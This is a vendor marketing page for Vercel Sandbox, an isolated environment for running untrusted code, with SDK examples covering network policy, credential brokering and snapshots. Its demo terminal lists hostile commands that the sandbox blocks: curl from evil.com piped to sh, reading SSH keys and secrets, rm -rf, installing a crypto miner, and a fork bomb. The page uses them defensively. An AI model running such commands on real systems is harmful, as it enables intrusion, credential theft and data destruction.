Skip to content

The safest way to run code you didn’t write

Modern apps increasingly need to execute code they didn’t author. From AI agents, customer scripts, or dynamic systems.
Avoid unintended access to your environment variables, databases, and other secure environments

Vercel Sandbox

# Production Environment: âś“ Protected
$ echo $API_SECRET
âś— Error: Undefined
$ psql $DATABASE_URL
âś— Error: Database connection blocked
$ aws s3 ls s3://prod-bucket
âś— Error: Cloud resources isolated
$ cat ~/.ssh/id_rsa
âś— Error: SSH keys not accessible
Protect against potentially unsafe system commands, unintended resource usage, and escalated privileges

Vercel Sandbox

# Attempted Commands: âś“ Blocked by Sandbox
$ curl http://evil.com/payload.sh | sh
âś— Error: External network access denied
$ rm -rf /system/*
âś— Error: Filesystem access restricted
$ sudo apt-get install mining-software
âś— Error: Privilege escalation not permitted
$ while true; do fork; done
âś— Error: Resource limits exceeded
Modern apps increasingly need to execute code they didn’t author. From AI agents, customer scripts, or dynamic systems.

Vercel Sandbox

// AI Agent generated code
const code = await agent.generateCode(userPrompt);
const sb = await Sandbox.create({ runtime: 'python3.13' });
const result = await sb.runCommand({ cmd:'python', args: ['-c', code]});
// User-provided script
const userScript = request.body.script;
const sbUser = await Sandbox.create({ timeout: ms('5m') });
await sbUser.runCommand({ cmd: 'node', args: ['-e', 'user-script.js'] });
// Third-party plugin
const sbPlugin = await Sandbox.create({ resources: { vcpus: 2 } });
await sbPlugin.runCommand({ cmd: 'node', args: ['-e', 'plugin.js'] });
Security

Network Firewall with Credentials Brokering

Control egress traffic with fine-grained network policies that can be updated at runtime. Credentials brokering injects secrets into outbound requests without exposing them inside the sandbox, preventing data exfiltration even when running untrusted code.

  • Dynamic policies: allow-all, deny-all, or user-defined rules
  • Credentials injected on egress: never enter sandbox scope
  • Domain-based allowlists with wildcard support
  • Live policy updates without restarting processes

Vercel Sandbox

const sandbox = await Sandbox.create({
network: {
policy: 'allow-all',
},
});
// Install dependencies with full network access
await sandbox.runCommand({ cmd: 'npm', args: ['install'] });
// Lock down network before running untrusted code
await sandbox.setNetworkPolicy({
policy: 'user-defined',
allowedDomains: ['api.openai.com', '*.vercel.app'],
// Credentials injected on egress - never in sandbox
transformations: [{
domain: 'api.openai.com',
headers: { Authorization: 'Bearer $OPENAI_API_KEY' },
}],
});
Performance

Snapshots with Instant Environment Restore

Capture the complete state of a running sandbox (filesystem and installed packages), then restore it instantly. Share environments with teammates, checkpoint long-running tasks, or skip dependency installation entirely by snapshotting after setup.

  • Skip dependency installation on every run
  • Share identical environments with your team
  • Checkpoint progress on long-running tasks
  • Spin up multiple parallel instances from one snapshot

Vercel Sandbox

// Create a sandbox and set up your environment
const sandbox = await Sandbox.create();
await sandbox.runCommand({ cmd: 'npm', args: ['install'] });
await sandbox.runCommand({ cmd: 'npm', args: ['run', 'build'] });
// Capture the state as a snapshot
const snapshot = await sandbox.snapshot();
console.log('Snapshot created:', snapshot.id);
// Create new sandboxes instantly from the snapshot
const fast = await Sandbox.create({ snapshot: snapshot.id });
// Spin up multiple parallel instances from same snapshot
const runners = await Promise.all([
Sandbox.create({ snapshot: snapshot.id }),
Sandbox.create({ snapshot: snapshot.id }),
Sandbox.create({ snapshot: snapshot.id }),
]);

Cost-efficient, scalable execution with Fluid compute

Vercel Sandbox runs on Fluid compute, Vercel’s optimized execution model that scales CPU and memory dynamically across millions of executions.

With Active CPU pricing, you’re billed only when code is actively running, not during idle or wait time, resulting in up to 95% lower cost for workloads with bursty or I/O-bound patterns.

“Vercel Sandbox expands what our frontend infrastructure can handle. We plan to rely on it more for running untrusted code in AI workflows and for integrating tools that cannot run in a Node.js serverless function.”
Tudor GolubencoCTO, Xata
“Cua lets teams run computer-use agents from their apps with 100+ compatible VLMs — agents operate real desktops backed by Vercel Sandbox. Next.js playground on Vercel; agents execute in Vercel Sandbox via Cua with logs, replays, and evals.”
Francesco BonacciFounder, Cua

How much will it cost?

Estimate your monthly Vercel Sandbox costs. Adjust your workload settings and compare pricing across providers.

Get started

You can get started with Vercel Sandbox quickly and easily.

See more examples

Launch a secure, interactive sandbox environment in milliseconds.

$ npx sandbox create --connect

Quickly give Vercel Sandbox a try with your AI tool of choice.

Bootstrap a simple Node.js CLI that creates a Vercel sandbox. Use this code:

import { Sandbox } from '@vercel/sandbox';
const sandbox = await Sandbox.create();
const { exitCode } = await sandbox.runCommand({
cmd: 'node',
args: ['-e', 'process.exit(0)'],
});
console.log(exitCode === 0 ? 'ok' : 'failed');
await sandbox.stop();

Include auth setup (vercel login && vercel link) with error handling.

Frequently asked questions